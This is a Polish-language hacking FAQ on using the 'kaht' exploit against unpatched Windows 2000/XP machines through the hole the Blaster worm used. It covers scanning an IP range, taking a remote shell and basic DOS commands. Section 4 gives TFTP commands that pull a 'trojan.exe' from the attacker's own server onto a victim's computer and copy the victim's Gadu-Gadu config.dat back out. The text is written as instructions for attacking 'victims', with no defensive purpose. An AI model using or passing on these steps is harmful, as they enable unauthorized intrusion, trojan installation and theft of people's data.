kaht2.zip
1. Co to jest kaht 2. Jak go uzywac 3. Najwazniejsze komendy DOSu 4. Kopiujemy lub wysylamy plik na komputer ofiary
1. Kaht jest to exploit wykorzystujacy dziure w systemach Windows 2k i XP dziura ta umozliwia przejecie hakerowi pelnej kontroli nad komputerem, na ktorym nie zostala zainstalowana latka na ta dziure. Dziure ta wykorzystuje robak blaster.
2. A wiec jak go uzyc. Najpierw sciagamy kahta. Rozpakowujemy go do jakiegos folderu np c:kaht Teraz wlaczamy wiersz polecen. Aby to zrobic wciskamy START --} URUCHOM i piszemy: 'cmd' oczywiscie bez cudzyslowu. Pojawia sie nam dosowe okienko. Do obslugi kahta potrzebujemy przynajmniej minimalnej znajomosci komend dosu. Spis najwazniejszych komend zamieszcze w punkcie 3 tego FAQ. No wiec przechodzimy do folderu z kahtem i piszemy:
kaht [IP od ktorego zaczniemy poszukiwanie dziury w systemie] [IP na ktorym zakonczymy poszukiwanie dziury w systemie]
przyklad: kaht 192.168.0.34 192.168.0.57 ok teraz kaht skanuje podany zakres ip w poszukiwaniu dziur widzimy cos takiego:
- Connecting to 192.168.0.41 Sending Exploit to a [WinXP] Server...FAILED - Connecting to 192.168.0.46 Sending Exploit to a [WinXP] Server...FAILED - Connecting to 192.168.0.50 Sending Exploit to a [WinXP] Server...FAILED - Connecting to 192.168.0.44 Sending Exploit to a [WinXP] Server...FAILED
Oznacza to ze na wszystkich zeskanowanych komputerach jest zainstalowana lata na blastera. Dziwisz sie dlaczego nie zostaly zeskanowane wszystkie komputery z podanego zakresu a tylko cztery?? Dlatego ze pozostale komputery moga byc akurat wylaczone Ktore komputery sa wlaczone mozemy sprawdzic komenda „net view” w cmd lub konsole.
No dobra jak znajdziemy komputer ktory nie ma zainstalowanej laty to pojawi nam sie cos takiego:
Mamy teraz pelna kontrole nad komputerem. Nie ma takiego luksusu jaki uzyskujemy poslugujac sie Trojanami. Komendy trzeba wpisywac z klawiatury. Spis najwazniejszych komend podany jest w punkcie 3.
3. Najwazniejsze komendy:
dir - wyswietla spis wszystkich plikow i folderow znajdujacych sie w danym folderze.
cd - umozliwia przejscie do innego folderu {jak jestesmy w folderze C:windows i wpiszemy "cd system32" to przejdziemy do folderu C:windows system32. Jak wpiszemy "cd .." to przechodzimy o jeden stopien nizej czyli z foldery C:windowssystem32 z powrotem znajdziemy sie w folderze C:windows]
del [nazwa pliku] - usuwa podany plik {del c:windowswin.ini}
copy [plik do skopiowania] [plik gdzie ma byc skopiowany] - sluzy do kopiowania plikow, mozna takze zmieniac ich nazwe {copy C:autoexec.bat d:gryautoexec.bat skopiuje plik autoexec.bat do folderu d:gry, aby zmienic nazwe pliku piszemy: "copy C:autoexec.bat d:gryfrajer.txt" nie dosc ze skopiujemy plik do folderu d:gry to na dodatek zmienimy jego nazwe na frajer.txt]
4. Aby wyslac plik lub skopiowac plik od ofiary bedziemy potrzebowac programu uctftp jest to program ktory zaklada u nas na komputerze serwer TFTP. A wiec sciagamy ten program. Uruchamiamy go. Teraz mamy odpalony na swoim kompie Server. Mozemy wiec sciagac i uploadowac cos od/do naszej ofiary. Uwaga: tam gdzie znajduje sie plik uctftp.exe tam beda sciagac sie pliki i tam musza byc pliki ktore chcesz przeslac!
aby wgrac komus jakis plik na twardy piszemy:
TFTP -i [swoje IP] GET [nazwa pliku ktory chcemy skopiowac musi on sie znajdowac w folderze serwera TFTP u mnie jest to C:tftp] [nazwa jaka ma miec plik na komputerze ofiary] czyli w naszym przypadku jak chcemy skopiowac ofierze plik trojan.exe to piszemy:
TFTP -i 192.168.0.23 GET trojan.exe C:windowstrojan.exe
Jak chcemy od kogos skopiowac jakis plik wtedy uzywamy tej samej komendy tylko piszemy troche inaczej
TFTP -i [swoje IP] PUT [sciezke do pliku ktory chcemy skopiowac] [nazwa juz skopiowanego pliku] teraz w praktyce wykorzystamy to:
TFTP -i 192.168.0.23 PUT C:gadu-gaduuserslamerconfig.dat config.dat i w rezultacie w folderze C:tftp pojawil nam sie plik config.dat Oczywiscie caly czas musimy miec w tle odpalony program uctftp. Np. :
|